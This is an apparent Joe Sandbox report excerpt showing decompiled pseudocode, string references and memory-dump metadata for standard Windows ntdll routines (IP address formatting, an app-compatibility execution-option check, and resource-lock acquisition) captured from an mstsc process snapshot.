0x0262e9cc
0x0262e9d2
0x0262e9d2
0x0262e9cc
0x0260140c
0x02601411
0x02601431
0x0260143a
0x0260143c
0x0260143f
0x0260143f
0x02601442
0x02601447
0x026014a8
0x026014ac
0x0262e9e2
0x0262e9e7
0x0262e9ec
0x0262ea05
0x0262ea05
0x00000000
0x02601449
0x00000000
0x02601449
0x0260144c
0x02601459
0x02601462
0x02601469
0x0260146a
0x02601470
0x02601473
0x02601476
0x02601476
0x02601490
0x02601495
0x0260138e
0x02601390
0x02601397
0x02601398
0x02601399
0x026013a1
0x026013a4
0x026013a4
0x02601498
0x0260149c
0x0260149f
0x026014a2
0x00000000
0x00000000
0x026014a4
0x00000000
0x026014a4
0x02601413
0x02601415
0x02601416
0x02601419
0x0260141c
0x02601422
0x026013b7
0x026013bc
0x026013bf
0x026013bf
0x026013c2
0x02601424
0x02601424
0x02601424
0x02601427
0x0260142b
0x0260142c
0x0260142c
0x0260142c
0x00000000
0x0260141c
0x02601411

APIs

___swprintf_l.LIBCMT ref: 0260146B
___swprintf_l.LIBCMT ref: 02601490
___swprintf_l.LIBCMT ref: 0262E970

Strings

ffff:, xrefs: 0262E94B
::%hs%u.%u.%u.%u, xrefs: 0262E967
:%u.%u.%u.%u, xrefs: 0262E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 0262E9B0

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 47905478c36c1a5eb12fa2443227a98dcd752cd7a7e0d80b92e0aa525679dae4
Instruction ID: 067bf57b2c35e4757d77f2f9da0386989a19b80efb26004aef0e9ae8a6f600b2
Opcode Fuzzy Hash: 47905478c36c1a5eb12fa2443227a98dcd752cd7a7e0d80b92e0aa525679dae4
Instruction Fuzzy Hash: BE6126B1D00655AADF2CCF99C8C09BFBBB5FF85300B54C1AEE59A57680D335A640DB60

Uniqueness

Uniqueness Score: -1.00%

Function 025F7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E025F7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x26a2088; // 0x7614a8e1
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E025F7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02613F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E025CDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x26a4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02613F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E025D0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02613F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E025D8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02613F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0263E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02613F92();
					_t38 = 1;
					L2:
					return E025CE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x025f7f08
0x025f7f0f
0x025f7f12
0x025f7f1b
0x025f7f31
0x02613ead
0x02613eb4
0x00000000
0x00000000
0x02613eba
0x02613ecd
0x02613ed2
0x02613ee1
0x02613ee7
0x02613eec
0x02613f12
0x02613f18
0x02613f1a
0x00000000
0x00000000
0x02613f20
0x02613f26
0x02613f28
0x00000000
0x00000000
0x02613f2e
0x02613f30
0x00000000
0x00000000
0x02613f3a
0x02613f3b
0x02613f53
0x02613f64
0x02613f69
0x02613f6c
0x02613f6d
0x02613f6f
0x0261e304
0x0261e30f
0x0261e315
0x0261e31e
0x0261e321
0x0261e327
0x0261e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0261e32f
0x0261e32f
0x0261e337
0x0261e33a
0x0261e33b
0x0261e33d
0x0261e33f
0x0261e341
0x0261e341
0x0261e34e
0x0261e353
0x0261e358
0x0261e35d
0x0261e35f
0x00000000
0x00000000
0x0261e365
0x0261e365
0x0261e368
0x0261e36e
0x00000000
0x00000000
0x0261e374
0x0261e32f
0x02613f75
0x02613f7a
0x02613f7c
0x02613f7e
0x02613f86
0x025f7f39
0x025f7f47
0x025f7f47
0x025f7f37
0x025f7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02613F12

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0261E2FB
Execute=1, xrefs: 02613F5E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02613F4A
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02613F75
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02613EC4
ExecuteOptions, xrefs: 02613F04
CLIENT(ntdll): Processing section info %ws..., xrefs: 0261E345

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 846acd3cfeab939094bfd75ad13f9c418bd4176fc03638633da79419e6f3ba12
Instruction ID: 9c5d771aa6709d4a683a0ac585eeb3c3125a81b8d05991eeaa5dba0f84c07b86
Opcode Fuzzy Hash: 846acd3cfeab939094bfd75ad13f9c418bd4176fc03638633da79419e6f3ba12
Instruction Fuzzy Hash: 0F41FA3168030D7EEB609E94DCC5FDAB3BDBF58704F0404ADA605E6180E770EA458F68

Uniqueness

Uniqueness Score: -1.00%

Function 02600B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02600B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E025D8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E025CDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02600CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02600CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E026006BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E026006BA(_t135, _t178) == 0 || E02600A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02600CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02600CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E026006BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E026006BA(_t124, _t142) == 0 || E02600A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02600b21
0x02600b24
0x02600b27
0x02600b2a
0x02600b2d
0x02600b30
0x02600b33
0x02600b36
0x02600b39
0x02600b3e
0x02600c65
0x02600c68
0x02600c6a
0x02600c6f
0x0262eb42
0x00000000
0x00000000
0x0262eb48
0x0262eb48
0x02600c75
0x02600c7a
0x0262eb54
0x00000000
0x00000000
0x00000000
0x0262eb5a
0x02600c80
0x02600c84
0x0262eb98
0x00000000
0x00000000
0x0262eba6
0x02600cb8
0x02600cba
0x02600cd3
0x02600cda
0x02600ce4
0x02600ce9
0x00000000
0x02600cec
0x02600c8c
0x0262eb63
0x00000000
0x00000000
0x0262eb70
0x0262eb75
0x0262eb7d
0x00000000
0x00000000
0x0262eb8c
0x00000000
0x0262eb8c
0x02600c96
0x00000000
0x00000000
0x02600ca2
0x02600cac
0x02600cb4
0x00000000
0x00000000
0x02600b44
0x02600b47
0x02600b49
0x00000000
0x00000000
0x02600b4f
0x02600b50
0x00000000
0x00000000
0x02600b56
0x02600b62
0x02600b7c
0x02600bac
0x02600a0f
0x0262eaaa
0x00000000
0x0262eac4
0x0262eac4
0x02600bd0
0x02600bd0
0x02600bd4
0x02600bd9
0x00000000
0x00000000
0x02600bdb
0x02600be0
0x0262eb0e
0x02600a1a
0x00000000
0x02600a1a
0x0262eb1a
0x0262eb1f
0x0262eb27
0x00000000
0x00000000
0x0262eb36
0x00000000
0x0262eb36
0x02600bea
0x00000000
0x00000000
0x02600bf6
0x02600c00
0x02600c03
0x02600c0b
0x00000000
0x02600c0b
0x0262eaaa
0x00000000
0x02600a15
0x02600bb6
0x00000000
0x02600bc6
0x02600bc6
0x02600bcb
0x02600c15
0x00000000
0x00000000
0x02600c1d
0x02600c20
0x02600c21
0x02600c24
0x02600c24
0x02600c26
0x00000000
0x02600c26
0x02600bcd
0x00000000
0x02600bcd
0x02600b89
0x02600b89
0x02600b90
0x00000000
0x00000000
0x02600b96
0x00000000
0x02600b96
0x02600a04
0x02600a04
0x02600b9a
0x02600b9a
0x02600b9b
0x02600b9f
0x00000000
0x00000000
0x00000000
0x02600ba5
0x02600ac7
0x02600aca
0x0262eacf
0x00000000
0x0262eade
0x0262eade
0x0262eae3
0x00000000
0x00000000
0x0262eaf3
0x0262eaf6
0x0262eaf7
0x0262eafe
0x0262eb01
0x00000000
0x0262eb01
0x0262eacf
0x02600ad0
0x02600ad4
0x00000000
0x00000000
0x02600ada
0x02600ae6
0x02600c34
0x00000000
0x02600c47
0x02600c49
0x02600c4a
0x02600c4e
0x02600c51
0x02600c54
0x02600c57
0x02600c5a
0x00000000
0x00000000
0x00000000
0x02600c60
0x02600afb
0x02600afe
0x02600b02
0x02600b05
0x02600b08
0x00000000
0x02600b08
0x02600ae6
0x02600b44
0x026009f8
0x026009f8
0x026009f9
0x00000000
0x00000000
0x0262eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02600BF6
__fassign.LIBCMT ref: 02600CA2

Strings

:, xrefs: 02600AC7
:, xrefs: 02600BA9
., xrefs: 02600A0C

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 39d1c1a4897e0aeb9e9c60d99138f4d2489b4baa1b75941af4b63d2ccb3920da
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 5DA19E7190020ADECF2CCFA8C8847BFB7B5AF05309F24846AD842A73C1D7319649EB56

Uniqueness

Uniqueness Score: -1.00%

Function 02600554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E02600554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026a01c0;
									_push(_t144);
									_push(0);
									_t51 = E025BF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02604FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02613F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02613F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0264217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02613F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02603915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026a01c0;
												_push(_t138);
												_push(0);
												_t58 = E025BF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02604FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02613F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02613F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0264217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02613F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02603915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E025E5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E025BF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02603915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E025BF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02603915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E025BF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02603915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E025E5329(_t110, _t138);
																return E025E53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x0260055a
0x0260055d
0x02600563
0x02600566
0x026005d8
0x026005e2
0x026005e5
0x00000000
0x026005e7
0x026005e7
0x026005ea
0x026005f3
0x026005f3
0x02600568
0x02600568
0x02600568
0x02600569
0x02600569
0x02600569
0x0260056b
0x00000000
0x00000000
0x0262217f
0x02622183
0x0262225b
0x0262225f
0x02622189
0x0262218c
0x0262218f
0x02622194
0x02622199
0x0262219d
0x026221a0
0x026221a2
0x026221ce
0x026221ce
0x026221ce
0x026221d0
0x026221d6
0x026221de
0x026221e2
0x026221e8
0x026221e9
0x026221ec
0x026221f1
0x026221f6
0x00000000
0x00000000
0x026221f8
0x026221fb
0x02622206
0x0262220b
0x0262220c
0x02622217
0x02622226
0x0262222b
0x0262222c
0x0262222f
0x02622232
0x02622235
0x02622235
0x0262223a
0x0262223f
0x02622241
0x02622243
0x02622248
0x02622248
0x0262224d
0x0262224f
0x02622262
0x02622263
0x02622268
0x02622269
0x02622269
0x02622269
0x0262226d
0x00000000
0x00000000
0x02622276
0x02622279
0x0262227e
0x02622283
0x02622287
0x0262228a
0x0262228d
0x0262228f
0x026222bc
0x026222bc
0x026222bc
0x026222be
0x026222c4
0x026222cc
0x026222d0
0x026222d6
0x026222d7
0x026222da
0x026222df
0x026222e4
0x00000000
0x00000000
0x026222e6
0x026222e9
0x026222f4
0x026222f9
0x026222fa
0x02622305
0x02622314
0x02622319
0x0262231a
0x0262231d
0x02622320
0x02622323
0x02622323
0x02622328
0x0262232d
0x0262232f
0x02622331
0x02622336
0x02622336
0x0262233b
0x0262233d
0x02622350
0x02622351
0x02622356
0x02622359
0x02622359
0x0262235b
0x0262235d
0x025e5367
0x025e536b
0x025e5372
0x00000000
0x00000000
0x00000000
0x00000000
0x02622363
0x02622363
0x02622369
0x0262236a
0x0262236c
0x02622371
0x02622373
0x00000000
0x02622379
0x02622379
0x0262237a
0x0262237f
0x0262237f
0x02622385
0x02622386
0x02622389
0x0262238e
0x02622390
0x025e5378
0x025e537c
0x02622396
0x02622396
0x02622397
0x0262239c
0x026223a2
0x026223a3
0x026223a6
